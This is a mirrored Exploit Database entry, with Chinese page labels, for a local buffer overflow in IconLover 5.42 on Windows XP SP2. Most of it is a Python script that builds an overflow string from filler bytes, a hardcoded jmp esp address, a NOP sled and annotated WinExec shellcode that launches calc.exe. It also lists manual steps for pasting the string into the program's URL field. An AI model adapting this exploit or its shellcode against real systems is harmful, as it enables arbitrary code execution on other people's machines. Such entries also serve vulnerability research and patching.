IconLover 5.42 – Local Buffer Overflow

• Exploit Database
• 16 阅读

• 作者： cor3sm4sh3r
  日期： 2015-09-29
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38349/

• # Exploit Title: IconLover v5.42 Buffer Overflow Exploit
  # Date: 29/09/2015
  # Exploit Author: cor3sm4sh3r
  # Author email: cor3sm4sh3r[at]gmail.com
  # Contact: https://in.linkedin.com/in/cor3sm4sh3r
  # Twitter: https://twitter.com/cor3sm4sh3r
  # Category: Local
  # Tested : win XP professional sp2 
  
  
  '''
  Credits & Authors:
  ==================
  ZwX (http://zwx.fr/)
  [http://www.vulnerability-lab.com/show.php?user=ZwX]
  
  #References (Source):
  http://www.vulnerability-lab.com/get_content.php?id=1609
  
  Affected Product(s):
  ====================
  AHA-Soft
  Product: IconLover - Software (Windows) 5.42 and 5.45
  
  
  Manual steps to exploit...
  1. Copy the content ofexploit.txt to your clipboard
  2. Run the IconLover.exe software
  3. Click the File -> New Icon Lybrary option
  4. Click the Lybrary and push the Download button
  5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide
  6. Successful exploitation will open an instance of calc.exe!
   
  '''
  
  
  #!/usr/bin/env python
  #badchars = "\x00\x0a\x0d"
  junk= "\x41" * 1039
  eip= "\xed\x1e\x94\x7c"#jmp esp 7c941eed ntdll.dll ( XP sp2 )
  nopsled ="\x90"*20
  
  shellcode= "\x33\xc0" #=> XOR EAX,EAX|Zero out EAX register
  shellcode += "\x50" #=> PUSH EAX |Push EAX to have null-byte padding for "calc.exe"
  shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe"|Push The ASCII string to the stack
  shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc"|
  shellcode += "\x8B\xC4" #=> MOV EAX,ESP|Put a pointer to the ASCII string in EAX
  shellcode += "\x6A\x01" #=> PUSH 1 |Push uCmdShow parameter to the stack
  shellcode += "\x50" #=> PUSH EAX |Push the pointer to lpCmdLine to the stack
  shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d |Move the pointer to WinExec() into EBX
  shellcode += "\xFF\xD3" #=> CALL EBX
  shellcode += "\x33\xc0" #=> XOR EAX,EAX|Zero out EAX register
  shellcode += "\x50" #=> PUSH EAX |Push EAX
  shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 |Exit process
  shellcode += "\xFF\xD3" #=> CALL EBX
  
  packet = junk + eip + nopsled + shellcode + nopsled
  
  file=open('exploit.txt','w')
  file.write(packet)
  file.close()